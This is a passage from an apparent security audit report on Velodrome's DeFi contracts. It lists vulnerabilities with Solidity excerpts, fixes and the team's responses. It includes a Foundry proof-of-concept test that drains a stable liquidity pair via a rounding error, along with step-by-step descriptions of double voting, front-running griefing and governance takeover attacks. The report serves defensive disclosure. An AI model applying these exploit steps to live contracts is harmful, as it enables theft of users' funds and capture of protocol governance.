IReward(_lockedManagedReward).earned(address(token), _tokenId); ..SNIP.. // claim locked rewards (rebases + compounded reward) address[] memory rewards = new address[](1); rewards[0] = address(token); IReward(_lockedManagedReward).getReward(_tokenId, rewards); If the rebase rewards are not accrued in the LockedManagedRewards, users will not receive their pro-rata portion of the rebase rewards during withdrawal. Recommendation: Ensure that rebase rewards claimed by a managed NFT are accrued to LockedManage- dRewards contract. The depositFor function could be modified so that any deposits to a managed NFT will notify the LockedManage- dRewards contract Velodrome: Acknowledged and will fix. Fixed in commit 632c36 and commit e98472. Spearbit: Observed the following fixes in commit 632c36: • Added validation to ensure that the depositFor function cannot be called against a Locked NFT • If depositFor function is called against a Managed NFT, the deposited amount will be treated as locked rewards and it will notify the LockedManagedReward contract Observed the following fixes in commit e98472: • depositFor function cannot be called with a locked NFT • Only RewardDistributor can call depositFor function with a managed NFT • If depositFor function is called with a managed NFT, the function will notify the LockedManagedReward con- tract Based on the above, it was observed that the claimed rebase rewards of managed NFT are compounded within the LockedManagedReward contract. Verified. +5.2.5 Malicious users could deposit normal NFTs to a managed NFT on behalf of others without their permission Severity: High Risk Context: VotingEscrow.sol#L130 Description: The VotingEscrow.depositManaged function did not verify that the caller (msg.sender) is the owner of the _tokenId. As a result, a malicious user can deposit normal NFTs to a managed NFT on behalf of others without their permission. function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant { require(escrowType[_mTokenId] == EscrowType.MANAGED, "VotingEscrow: can only deposit into managed nft"); ,! require(!deactivated[_mTokenId], "VotingEscrow: inactive managed nft"); require(escrowType[_tokenId] == EscrowType.NORMAL, "VotingEscrow: can only deposit normal nft"); require(!voted[_tokenId], "VotingEscrow: nft voted"); require(ownershipChange[_tokenId] != block.number, "VotingEscrow: flash nft protection"); require(_balanceOfNFT(_tokenId, block.timestamp) > 0, "VotingEscrow: no balance to deposit"); ..SNIP.. The owner of a normal NFT will have their voting balance transferred to a malicious managed NFT, resulting in loss of rewards and voting power for the victim. Additionally, a malicious owner of a managed NFT could aggregate 14 voting power of the victim's normal NFTs, and perform malicious actions such as stealing the rewards from the victims or use its inflated voting power to pass malicious proposals. Recommendation: Implement additional validation to ensure that the caller is the owner of the deposited NFT. function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant { + + address sender = _msgSender(); require(_isApprovedOrOwner(sender, _tokenId), "VotingEscrow: not owner or approved"); require(escrowType[_mTokenId] == EscrowType.MANAGED, "VotingEscrow: can only deposit into managed nft"); ,! require(!deactivated[_mTokenId], "VotingEscrow: inactive managed nft"); ..SNIP.. Velodrome: Acknowledged and will fix. Fixed in commit 712e14. Spearbit: Verified. +5.2.6 First liquidity provider of a stable pair can DOS the pool Severity: High Risk Context: Pair.sol#L504, Pair.sol#L353 Description: The invariant k of a stable pool is calculated as follows Pair.sol#L505 function _k(uint256 x, uint256 y) internal view returns (uint256) { if (stable) { uint256 _x = (x * 1e18) / decimals0; uint256 _y = (y * 1e18) / decimals1; uint256 _a = (_x * _y) / 1e18; uint256 _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18); return (_a * _b) / 1e18; // x3y+y3x >= k } else { return x * y; // xy >= k } } The value of _a = (x * y ) / 1e18 = 0 due to rounding error when x*y < 1e18. The rounding error can lead to the invariant k of stable pools equals zero, and the trader can steal whatever is left in the pool. The first liquidity provider can DOS the pair by: 1.mint a small amount of liquidity to the pool, 2. Steal whatever is left in the pool, 3. Repeat step 1, and step 2 until the overflow of the total supply. To prevent the issue of rounding error, the reserve of a pool should never go too small. The mint function which was borrowed from uniswapV2 has a minimum liquidity check of sqrt(a * b) > MINIMUM_LIQUIDITY; This, however, isn't safe enough to protect the invariant formula of stable pools. Pair.sol#L344-L363 uint256 internal constant MINIMUM_LIQUIDITY = 10**3; // ... function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... uint256 _amount0 = _balance0 - _reserve0; uint256 _amount1 = _balance1 - _reserve1; uint256 _totalSupply = totalSupply(); if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; //@audit what about the fee? _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - ,! cannot be address(0) // ... } This is the POC of an exploit extended from Pair.t.sol 15 contract PairTest is BaseTest { // ... function drainPair(Pair pair, uint initialFraxAmount, uint initialDaiAmount) internal { DAI.transfer(address(pair), 1); uint amount0; uint amount1; if (address(DAI) < address(FRAX)) { amount0 = 0; amount1 = initialFraxAmount - 1; } else { amount1 = 0; amount0 = initialFraxAmount - 1; } pair.swap(amount0, amount1, address(this), new bytes(0)); FRAX.transfer(address(pair), 1); if (address(DAI) < address(FRAX)) { amount0 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount1 = 0; } else { amount1 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount0 = 0; } pair.swap(amount0, amount1, address(this), new bytes(0)); } function testDestroyPair() public { deployCoins(); deal(address(DAI), address(this), 100 ether); deal(address(FRAX), address(this), 100 ether); deployFactories(); Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); for(uint i = 0; i < 10; i++) { DAI.transfer(address(pair), 10_000_000); FRAX.transfer(address(pair), 10_000_000); // as long as 10_000_000^2 < 1e18 uint liquidity = pair.mint(address(this)); console.log("pair:", address(pair), "liquidity:", liquidity); console.log("total liq:", pair.balanceOf(address(this))); drainPair(pair, FRAX.balanceOf(address(pair)) , DAI.balanceOf(address(pair))); console.log("DAI balance:", DAI.balanceOf(address(pair))); console.log("FRAX balance:", FRAX.balanceOf(address(pair))); require(DAI.balanceOf(address(pair)) == 1, "should drain DAI balance"); require(FRAX.balanceOf(address(pair)) == 2, "should drain FRAX balance"); } DAI.transfer(address(pair), 1 ether); FRAX.transfer(address(pair), 1 ether); vm.expectRevert(); pair.mint(address(this)); } } Recommendation: Recommend to add two restrictions on the first lp of stable pools: 1. only allows equal amounts of liquidity. 2. invariant _k should be larger than the MINIMUM_K 16 function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - cannot be address(0) ,! if (stable) { require(_amount0 * 1e18 / decimals0 == _amount1 * 1e18 / decimals1, "Pair: Stable pair must be equal amounts"); require(_k(_amount0, _amount1) > MINIMUM_K, "Pair: Stable pair must be above minimum k"); } // ... } + + ,! + ,! + } Velodrome: I agree with this finding. MINIMUM_K is not specified, but I assume it to be equal to zero. We will fix it. Is there any reason why the initial deposit must be equal? In practice, stable pools often aren't perfectly 1:1 pegged, and if the difference is significant, this change will guarantee that the initial deposit will always be small. It may not make much difference but just want to know all the thinking behind it. Spearbit: Agreed that enforcing the 1:1 ratio forces first lp lose money in many cases. We can prob remove it if setting a higher MINIMUM_K. The reason to enforce the 1:1 ratio is just a precautions check. It's when lp can contribute to max invariant k with minimum tokens; the issue of rounding error should be mildest. As for MINIMUM_K, 10e9 would be a safe one. The invariant can decrease in some cases. The x3y+y3x AMM is quite unique. This is the less-studied curve among all popular AMM. We will revisit this issue and "the decreased invariant one" and figure out a tighter safe bound after going through the other part of the protocol. At the time, I tend to keep the security margin and set a higher MINIMUM_K. Velodrome: Fixed in commit 59f9c1. Spearbit: Verified. 5.3 Medium Risk +5.3.1 Certain functions are unavailable after opting in to the "auto compounder Severity: Medium Risk Context: AutoCompounder.sol Description: Certain features (e.g., delegation, governance voting) of a veNFT would not be available if the veNFT is transferred to the auto compounder. Let x be a managed veNFT. When an "auto compounder" is created, ownership of x is transferred to the AutoCom- pounder contract, and any delegation within x is cleared. The auto compounder can perform gauge weight voting using x via the provided AutoCompounder.vote function. However, it loses the ability to perform any delegation with x because the AutoCompounder contract does not contain a function that calls the VotingEscrow.delegate function. Only the owner of x, the AutoCompounder contract, can call the VotingEscrow.delegate function. x also loses the ability to vote on governance proposals as the existing AutoCompounder contract does not support this feature. Once the owner of the managed NFTs has opted in to the "auto compounder," it is not possible for them to subsequently "opt out." Consequently, if they need to exercise delegation and governance voting, they will be unable to do so, exacerbating the impact. 17 Recommendation: Most users would expect their managed NFTs to function similarly after moving them to the "auto compounder" with the extra benefit of automatically compounding the rewards. Thus, it is recommended that any features available to a managed NFT should also be ported over to the "auto compounder". Otherwise, document these limitations so that the users would be aware of this before using the "auto compounder" Velodrome: The design to prevent voting/delegation from the managed veNFT ((m)veNFT) is intentional. There is potential for Velodrome governance abuse by an (m)veNFT that gains too much voting power from its' underlying locked veNFTs. We completed similar research for LP delegation and determined it is better for the protocol to prevent overweight voting from entities who have voting power not intentionally given to them. In this case, a user would be locking up their veNFT with the intention of receiving the auto-compounding returns, not delegating their voting rights away. Spearbit: Acknowledged. +5.3.2 Claimable gauge distributions are locked when killGauge is called Severity: Medium Risk Context: Voter.sol#L297-L311 Description: When a gauge is killed, the claimable[_gauge] key value is cleared. Because any rewards received by the Voter contract are indexed and distributed in proportion to each pool's weight, this claimable amount is permanently locked within the contract. Recommendation: Consider returning the claimable amount to the Minter contract. It is important to note that votes will continue to persist on the killed gauge, so it may also make sense to wipe these votes too. Otherwise, the killed gauge will continue to accrue rewards from the Minter contract. Velodrome: We intend on returning claimable to Minter. I think clearing votes is not possible without a lot of changes to the code as there is no way of fetching which nfts voted for a specific pool without iterating through all of them and this may have unexpected side effects with reset, so I think the best that can be done is to communicate that the gauge has been killed. Velodrome: Fixed in commit e4b230. Spearbit: The fix will send a gauge's claimable funds back to the Minter contract in killGauge(). However, it does not handle the case where residual votes on a pool will continue to allocate minted tokens to a gauge. Velodrome: Is it possible for the mitigation to be complete by returning funds in updateFor(address _gauge) as well? By complete I mean addressing the edge case that votes remain on the pool, and thus causing minting supply to be trapped. That way, even if there are residual votes (_supplied), any claimable that exists is returned to the minter instead of being trapped in Voter. Note that updateFor is only callable once per week as the index value is only updated once per week when update_period is called. Something like this: if (_delta > 0) { uint256 _share = (uint256(_supplied) * _delta) / 1e18; // add accrued difference for each supplied token ,! if (isAlive[_gauge]) { claimable[_gauge] += _share; } else { IERC20(rewardToken).safeTransfer(minter, _share); } } Spearbit: Agreed that the residual votes issue would be remediated if updateFor() was updated to transfer back minted tokens if the gauge has been killed. 18 +5.3.3 Bribe and fee token emissions can be gamed by users Severity: Medium Risk Context: Voter.sol#L154-L224 Description: A user may vote or reset their vote once per epoch. Votes persist across epochs and once a user has distributed their votes among their chosen pools, the poke() function may be called by any user to update the target user's decayed veNFT token balance. However, the poke() function is not hooked into any of the reward distribution contracts. As a result, a user is incentivized to vote as soon as they create their lock and avoid re-voting in subsequent epochs. The amount deposited via Reward._deposit() does not decay linearly as how it is defined under veToken mechanics. Therefore, users could continue to earn trading fees and bribes even after their lock has expired. Simultaneously, users can poke() other users to lower their voting weight and maximize their own earnings. Recommendation: Re-designing the FeesVotingReward and BribeVotingRewards contracts may be worthwhile to decay user deposits automatically. Velodrome: Given that there are a lot of assumptions around the severity of the attack (i.e. how likely a user would wish to do this, given competing incentives around maximizing returns and the risk that they can be poked at any time, etc), we have elected to go with a solution that involves incentivizing the poking of tokenIds that are passively voting for too long. It will look something like this. On the last day of every epoch, any tokenId that is over some value, that has been passively voting for some time, will be incentivized to be poked. This will amend down that NFT's contribution and discourage long-term passive behavior as well as abuse. The parameters ("some value" and "some time") will be mutable and can be modified to reduce the cost of incentivization. Some initial ideas of values would be to poke any NFT worth more than 1_000 VELO that has passively voted for 4 weeks. We will assess the severity of the issue in practice and make changes accordingly. Spearbit: Acknowledged. While it is true that users are incentivized to poke other users who are passively voting on pools for too long, this mechanism is still inefficient and does not feasibly scale with users. +5.3.4 Desync between bribes being paid and gauge distribution allows voters to receive bribes without triggering emissions Severity: Medium Risk Context: Voter.sol#L448 Description: Because of the fact that BribeVotingReward will award bribes based on the voting power at EPOCH_- END - 1, but Minter.update_period() and Voter.distribute() can be called at a time after, some voters may switch their vote before their weight influences emissions, causing the voters to receive bribes, but the bribing protocols to not have their gauge receive the emissions. For example: Let's say as project XYZ I'm going to bribe for 3 weeks in a row and it will be the best yield offered What you could do due to the discrepancy between distribute and the rewards is: • You can vote for 3 weeks • As soon as the 3rd vote period has ended (Reward epoch), you can vote somewhere else The 3rd vote will: • Award you with the 3rd week epoch of rewards • Can be directed towards a new Gauge, causing the distribution to not be in-line with the Bribes The desync between: • Bribes being Paid (EPOCH_END - 1) and • distribution happening some-time after, EPOCH_END + X 19 Means that some bribes can get the reward without "reciprocating" with their vote weight. Velodrome: Discussed this with the team. We acknowledge that it is an issue, although we do think that economic incentives encourage voters to vote later during the epoch (as they will seek to profit maximize, this was discussed elsewhere in another issue). Due to the potential risk of loss for partners, we considered a simple mitigation of preventing voting in another window (an hour long post epoch flip, similar to the votium-style time window) to allow distributions to take place. Distributions are an automation target and will be incentivized down the track. I have thought about it and have also considered an option where users passively call distribute prior to voting (e.g. perhaps in reset but it appears it does not mitigate the issue as it requires ALL pools to be distributed (at a fixed total voting weight supply), prior to allowing votes to change. Thus, I continue to think that the simplest fix is to implement a post-epoch voting window of an hour to allow distributions to take place. Fixed in commit b517ab. Spearbit: Verified. Agree that allowing 1 hour post-voting window for protocols to trigger distribute is an appropriate mitigation. +5.3.5 Compromised or malicious owner can drain the VotingEscrow contract of VELO tokens Severity: Medium Risk Context: VotingEscrow.sol#L119-L122, FactoryRegistry.sol#L72-L82 Description: The FactoryRegistry contract is an Ownable contract with the ability to control the return value of the managedRewardsFactory() function. As such, whenever createManagedLockFor() is called in VotingEscrow, the FactoryRegistry contract queries the managedRewardsFactory() function and subsequently calls createRe- wards() on this address. If ownership of the FactoryRegistry contract is compromised or malicious, the createRewards() external call can return any arbitrary _lockedManagedReward address which is then given an infinite token approval. As a result, it's possible for all locked VELO tokens to be drained and hence, this poses a significant centralization risk to the protocol. Recommendation: Avoid using infinite approvals unless the target is guaranteed to be deterministic and im- mutable. Consider modifying the increaseAmount() and all other instances where IReward(_lockedManage- dReward).notifyRewardAmount() is called. The proposed fix may look like the following: function createManagedLockFor(address _to) external nonReentrant returns (uint256 _mTokenId) { ... (address _lockedManagedReward, address _freeManagedReward) = IManagedRewardsFactory( IFactoryRegistry(factoryRegistry).managedRewardsFactory() ).createRewards(voter); IERC20(token).approve(_lockedManagedReward, type(uint256).max); ... - } function increaseAmount(uint256 _tokenId, uint256 _value) external nonReentrant { ... if (_escrowType == EscrowType.MANAGED) { // increaseAmount called on managed tokens are treated as locked rewards address _lockedManagedReward = managedToLocked[_tokenId]; IERC20(token).approve(_lockedManagedReward, _value); IReward(_lockedManagedReward).notifyRewardAmount(address(token), _value); + } } Velodrome: Fixed in commit 6726f2. Spearbit: Verified. 20 +5.3.6 Unsafe casting in RewardsDistributor leads to underflow of veForAt Severity: Medium Risk Context: RewardsDistributor.sol#L121-L127 Description: Solidity does not revert when casting a negative number to uint. Instead, it underflows to a large number. In the RewardDistributor contract, the balance of a token at specific time is calculated as follows IVotingEscrow.Point memory pt = IVotingEscrow(_ve).userPointHistory(_tokenId, epoch); Math.max(uint256(int256(pt.bias - pt.slope * (int128(int256(_timestamp - pt.ts))))), 0); This supposes to return zero when the calculated balance is a negative number. However, it underflows to a large number. This would lead to incorrect reward distribution if third-party protocols depend on this function, or when further updates make use of this codebase. Recommendation: Recommend following other parts of the codebase and returning zero for a negative number. int256 result = int256(pt.bias - pt.slope * int128(int256(_timestamp - pt.ts))); if (result < 0) return 0; return uint256(result); Also, recommend applying the fix to other parts of rewardDistributor RewardsDistributor.sol#L196 RewardsDis- tributor.sol#L254 RewardsDistributor.sol#L145 Velodrome: Fixed in commit 6485ef. Spearbit: Verified. +5.3.7 Proposals can be griefed by front-running and canceling Severity: Medium Risk Context: VeloGovernor.sol#L19 Description: Because the Governor uses OZ's Implementation, a griefter can front-run a valid proposal with the same settings and then immediately cancel it. You can avoid the grief by writing a macro contract that generates random descriptions to avoid the front-run. See: code-423n4/2022-09-nouns-builder-findings#182. Recommendation: Add proposer to the proposalHash() function to avoid griefing. Velodrome: Fixed in commit b2f8f2. Spearbit: Verified. +5.3.8 pairFor does not correctly sort tokens when overriding for SinkConverter Severity: Medium Risk Context: Router.sol#L59-L90 Description: The router will always search for pairs by sorting tokenA and TokenB. Notably, for the velo and Velo2 pair, the Router will not perform the sorting 21 //Router.sol#L69-L73 if (factory == defaultFactory) { if ((tokenA == IPairFactory(defaultFactory).velo()) && (tokenB == ,! IPairFactory(defaultFactory).veloV2())) { return IPairFactory(defaultFactory).sinkConverter(); } } Meaning that the pair for Velo -> Velo2 will be the Sink but the pair for Velo2 -> Velo will be some other pair. Additionally, you can front-run a call to setSinkConverter() by calling createPair() with the same parameters. How- ever, the respective values for getPair() would be overwritten with the sinkConverter address. This could lead to some weird and unexpected behaviour as we would still have an invalid Pair contract for the v1 and v2 velo tokens. Recommendation: It may be best to enforce the 1 way direction but sort the pair to ensure that all Velo -> Velo2 go to the Sink. Velodrome: Fix implemented commit b0adb4. The front-run still exists where a legit VELO/VELO V2 token pair could be created but from the router perspective, once PairFactory.setSinkConverter() is called, the invalid created pair would be ignored. Spearbit: Verified. +5.3.9 Inconsistent between balanceOfNFT, balanceOfNFTAt and _balanceOfNFT functions Severity: Medium Risk Context: VotingEscrow.sol#L985, VotingEscrow.sol#L976 Description: The balanceOfNFT function implements a flash-loan protection that returns zero voting balance if ownershipChange[_tokenId] == block.number. However, this was not consistently applied to the balanceOfNF- TAt and _balanceOfNFT functions. VotingEscrow.sol function balanceOfNFT(uint256 _tokenId) external view returns (uint256) { if (ownershipChange[_tokenId] == block.number) return 0; return _balanceOfNFT(_tokenId, block.timestamp); } As a result, Velodrome or external protocols calling the balanceOfNFT and balanceOfNFTAt external functions will receive different voting balances for the same veNFT depending on which function they called. Additionally, the internal _balanceOfNFT function, which does not have flash-loan protection, is called by the VotingEscrow.getVotes function to compute the voting balance of an account. The VotingEscrow.getVotes function appears not to be used in any in-scope contracts, however, this function might be utilized by some exter- nal protocols or off-chain components to tally the votes. If that is the case, a malicious user could flash-loan the veNFTs to inflate the voting balance of their account. Recommendation: If the requirement is to have all newly transferred veNFTs (ownershipChange[_tokenId] == block.number) have zero voting balance to prevent someone from flash-loaning veNFT to increase their voting balance, the flash-loan protection should be consistently implemented across all the related functions. Velodrome: I think the current status of this issue is that once timestamp governance is merged in, block-based balance functions will be removed as the contract will adopt timestamps as its official "clock" (see EIP6372). Once it is merged, we will assess the consistency of ownership_change on the various fns. Spearbit: Acknowledged. 22 +5.3.10 Nudge check will break once limit is reached Severity: Medium Risk Context: Minter.sol#L75 Description: Because you're checking both sides, once oldRate reaches the MAX_RATE, every new nudge call will revert. Meaning that if _newRate ever get's to MAXIMUM_TAIL_RATE or MINIMUM_TAIL_RATE, nudge will stop working. Recommendation: It's probably best to let the value update and then cap it, without a require. Any proposal that goes over cap can be allowed to go through, but be forced to be idempotent. E.g. newRate And rate == NUDGE ? 0 : rate - NUDGE for the decrease. = rate + NUDGE > maxRate ? maxRate for the upside Velodrome: Fixed in commit 42ee2c. The Velodrome team has modified the downside boundary code to keep it consistent with the upper boundary code. It is noted that the downside boundary is at 1 BPS as there must always be some emissions. Spearbit: Mitigation LGTM • Removed require (prevents reverts) • If above cap, cap to max • If below the lower cap, bring back to 1, and avoids the underflow as long as NUDGE is 1, which is fine Spearbit: Verified. +5.3.11 ownershipChange can be sidestepped Severity: Medium Risk Context: VotingEscrow.sol#L137-L138 Description: The check there is to prevent adding to managed after a transfer from or creation require(ownershipChange[_tokenId] != block.number, "VotingEscrow: flash nft protection"); However, it doesn't prevent adding and removing from other managed tokens, merging, or splitting. For this reason, we can sidestep the lock by splitting Because ownershipChange is updated exclusively on _transferFrom, we can side-step it being set by splitting the lock into a new one which will not have the lock. Recommendation: Consider if the lock is necessary and add additional checks to prevent users from side- stepping. Alternatively, the lock functionality may be removed to focus on maintaining underlying invariants. Velodrome: Fixed in commit 02e0bc. Spearbit: Verified. 23 +5.3.12 The fromBlock variable of a checkpoint is not initialized Severity: Medium Risk Context: VotingEscrow.sol#L1353, VotingEscrow.sol#L1256 Description: A checkpoint contains a fromBlock variable which stores the block number the checkpoint is created. /// @notice A checkpoint for marking delegated tokenIds from a given block struct Checkpoint { uint256 fromBlock; uint256[] tokenIds; } However, it was found that the fromBlock variable of a checkpoint was not initialized anywhere in the codebase. Therefore, any function that relies on the fromBlock of a checkpoint will break. The VotingEscrow._findWhatCheckpointToWrite and VotingEscrow.getPastVotesIndex functions were found to rely on the fromBlock variable of a checkpoint for computation. The following is a list of functions that calls these two affected functions. _findWhatCheckpointToWrite -> _moveTokenDelegates -> _transferFrom _findWhatCheckpointToWrite -> _moveTokenDelegates -> _mint _findWhatCheckpointToWrite -> _moveTokenDelegates -> _burn _findWhatCheckpointToWrite -> _moveAllDelegates -> _delegate -> delegate/delegateBySig getPastVotesIndex -> getTokenIdsAt getPastVotesIndex -> getPastVotes -> GovernorSimpleVotes._getVotes Instance 1 - VotingEscrow._findWhatCheckpointToWrite function The VotingEscrow._findWhatCheckpointToWrite function verifies if the fromBlock of the latest checkpoint of an account is equal to the current block number. If true, the function will return the index number of the last checkpoint. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } As such, this function does not work as intended and will always return the index of a new checkpoint. Instance 2 - VotingEscrow.getPastVotesIndex function The VotingEscrow.getPastVotesIndex function relies on the fromBlock of the latest checkpoint for optimization purposes. If the request block number is the most recently updated checkpoint, it will return the latest index immediately and skip the binary search. Since the fromBlock variable is not populated, the optimization will not work. 24 function getPastVotesIndex(address account, uint256 blockNumber) public view returns (uint32) { uint32 nCheckpoints = numCheckpoints[account]; if (nCheckpoints == 0) { return 0; } // First check most recent balance if (_checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) { return (nCheckpoints - 1); } // Next check implicit zero balance if (_checkpoints[account][0].fromBlock > blockNumber) { return 0; } uint32 lower = 0; uint32 upper = nCheckpoints - 1; while (upper > lower) { uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow Checkpoint storage cp = _checkpoints[account][center]; if (cp.fromBlock == blockNumber) { return center; } else if (cp.fromBlock < blockNumber) { lower = center; } else { upper = center - 1; } } return lower; } Recommendation: Initialize the fromBlock variable of the checkpoint in the codebase. Velodrome: Fixed in commit a670bf. Spearbit: Verified. +5.3.13 Double voting by shifting the voting power between managed and normal NFTs Severity: Medium Risk Context: VotingEscrow.sol#L165 Description: Owners of normal NFTs and managed NFTs could potentially collude to double vote, which affects the fairness of the gauge weight voting. A group of malicious veNFT owners could exploit this and use the inflated voting balance to redirect the VELO emission to gauges where they have a vested interest, causing losses to other users. The following shows that it is possible to increase the weight of a pool by 2000 with a 1000 voting balance within a single epoch by shifting the voting power between managed and normal NFTs. For simplicity's sake, assume the following • Alice is the owner of a managed NFT (tokenID=888) • Bob is the owner of a normal NFT (tokenID=999) • Alice's managed NFT (tokenID=888) only consists of one (1) normal NFT (tokenID=999) that belongs to Bob being locked up. The following steps are executed within the same epoch. At the start, the state is as follows: • Voting power of Alice's managed NFT (tokenID=888) is 1000 25 – The 1000 voting came from the normal NFT (tokenID=999) during the deposit – weights[_tokenId][_mTokenId] = _weight | weights[999][888] = 1000; • Voting power of Bob's normal NFT (tokenID=999) is zero (0) • Weight of Pool X = 0 Alice calls Voter.vote function with his managed NFT (tokenID=888), and increases the weight of Pool X by 1000. Subsequently, the lastVoted[_tokenId] = _timestamp at Line 222 in the Voter.vote function will be set, and the onlyNewEpoch modifier will ensure Alice cannot use the same managed NFT (tokenID=888) to vote again in the current epoch. However, Bob could call the VotingEscrow.withdrawManaged to withdraw his normal NFT (tokenID=999) from the managed NFT (tokenID=888). Within the function, it will call the internal _checkpoint function to "transfer" the voting power from managed NFT (tokenID=888) to normal NFT (tokenID=999). At this point, the state is as follows: • Voting power of Alice's managed NFT (tokenID=888) is zero (0) • Voting power of Bob's normal NFT (tokenID=999) is 1000 • Weight of Pool X = 1000 Bob calls Voter.vote function with his normal NFT (tokenID=999) and increases the weight of Pool X by 1000. Since normal NFT (tokenID=999) has not voted in the current epoch, it is allowed to vote. The weight of Pool X becomes 2000. It was observed that a mechanism is in place to punish and disincentivize malicious behaviors from a managed NFT owner. The protocol's emergency council could deactivate Managed NFTs involved in malicious activities via the VotingEscrow.setManagedState function. In addition, the ability to create a managed NFT is restricted to only an authorized manager and protocol's governor. These factors help to mitigate some risks related to this issue to a certain extent. Recommendation: Consider calling the Voter.poke function against the managed NFT (e.g. tokenID=888) au- tomatically within the VotingEscrow.withdrawManaged function so that the weight provided to the pools by a managed NFT (e.g. tokenID=888) will be reduced by the voting balance of the normal NFT to be withdrawn. Velodrome: Fixed in commit 3926ee. Spearbit: Verified. +5.3.14 MetaTX is using the incorrect Context Severity: Medium Risk Context: Gauge.sol#L12 Description: Throughout the codebase, the code uses Context for _msgSender() The implementation chosen will resolve each _msgSender() to msg.sender which is inconsistent with the goal of allowing MetaTX. Recommendation: Replace the import of Context with ERC2771Context Also see: guide-metatx#compile-using-hardhat. Velodrome: Fixed in commit 84a2d8. Spearbit: Verified. 26 +5.3.15 depositFor function should be restricted to approved NFT types Severity: Medium Risk Context: VotingEscrow.sol#L807 Description: The depositFor function was found to accept NFT of all types (normal, locked, managed) without restriction. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, "VotingEscrow: zero amount"); require(oldLocked.amount > 0, "VotingEscrow: no existing lock found"); require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } Instance 1 - Anyone can call depositFor against a locked NFT Users should not be allowed to increase the voting power of a locked NFT by calling the depositFor function as locked NFTs are not supposed to vote. Thus, any increase in the voting balance of locked NFTs will not increase the gauge weight, and as a consequence, the influence and yield of the deposited VELO will be diminished. In addition, the locked balance will be overwritten when the veNFT is later withdrawn from the managed veNFT, resulting in a loss of funds. Instance 2 - Anyone can call depositFor against a managed NFT Only the RewardsDistributor.claim function should be allowed to call depositFor function against a managed NFT to process rebase rewards claimed and to compound the rewards into the LockedManagedReward contract. However, anyone could also increase the voting power of a managed NFT directly by calling depositFor with a tokenId of a managed NFT, which breaks the invariant. Recommendation: Evaluate the type of NFTs (normal, locked, or managed) that can call the depositFor function within protocol. Based on the current design of the protocol: • Normal NFT - Anyone can call depositFor against a normal NFT • Locked NFT - No one should be able to call depositFor against a locked NFT • Managed NFT - Only RewardsDistributor.claim function is allowed to call depositFor function against a managed NFT for processing rebase rewards. Consider implementing the following additional check to disallow anyone from calling depositFor function against a Locked NFT: function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { + + ,! EscrowType _escrowType = escrowType[_tokenId]; require(_escrowType != EscrowType.LOCKED, "VotingEscrow: Not allowed to call depositFor against Locked NFT"); LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, "VotingEscrow: zero amount"); require(oldLocked.amount > 0, "VotingEscrow: no existing lock found"); require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } Sidenote: Additionally, the depositFor function should be modified to handle incoming Managed NFT's rebase rewards from the RewardsDistributor. Refer to the recommendation in "Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward". 27 Velodrome: Fixed in commit e98472. Spearbit: Verified. +5.3.16 Lack of vetoer can lead to 51% attack Severity: Medium Risk Context: VeloGovernor.sol, EpochGovernor.sol Description: The veto power is important functionality in a governance system in order to protect from malicious proposals. However there is lack of vetoer in VeloGovernor , this might lead to Velodrome losing their veto power unintentionally and open to 51% attack. With 51% attack a malicous actor can change the governor in Voter contract or by pass the tokens whitelist adding new gauge with malicious token. References • dialectic.ch/editorial/nouns-governance-attack-2 • code4rena.com/reports/2022-09-nouns-builder/#m-11-loss-of-veto-power-can-lead-to-51-attack Recommendation: Is recommended to add vetoer with two step validation and add the function to execute a veto. Example of veto function, should adapt the code to use it: function veto(bytes32 _proposalId) external { // Ensure the caller is the vetoer require(msg.sender == vetoer, "Only vetoer"); ProposalState status = state(proposalId); // Ensure the proposal has not been executed require( status != ProposalState.Canceled && status != ProposalState.Expired && status != ProposalState.Executed, ,! "Proposal not active" ); // Get the pointer to the proposal Proposal storage proposal = proposals[_proposalId]; // Update the proposal as vetoed proposal.vetoed = true; emit ProposalVetoed(_proposalId); } Velodrome: Acknowledged, given the ability of this to severely disrupt normal operation of the protocol. I think the simplest way to implement this would be to use the _cancel function provided in Governor. We will also add the ability to set/change a vetoer, which will most likely be set to emergencyCouncil (will ask for feedback around this). Are there any recommendations regarding parameters that should be set? e.g. the appropriate quorum fraction? Spearbit: Additional considerations, especially during migration from V1 to V2, there should be a time in which it will be very cheap to attack the Governor without a vetoer, the first attack could be as simple as raising the quorum (which may force the V1 price to raise as it becomes more urgent to migrate it for V2) This may be used for example to enable new tokens which are malicious/privileged with the goal of obtaining emissions from V2 in perpetuity and keeping enough of a headstart to make it impossible for others to catch up Set of attacks: • Whitelist privileged pair (to steal emissions) • Raise quorum to make it harder / impossible to catchup • Set governor to an EOA / Hijack it 28 • Create a managed lock and refuse to create it for others Velodrome: Fixed in commit 64fe60. Spearbit: Verified. 5.4 Low Risk +5.4.1 Compromised or malicious owner can siphon rewards from the Voter contract Severity: Low Risk Context: FactoryRegistry.sol#L35-L69, Voter.sol#L272-L279 Description: 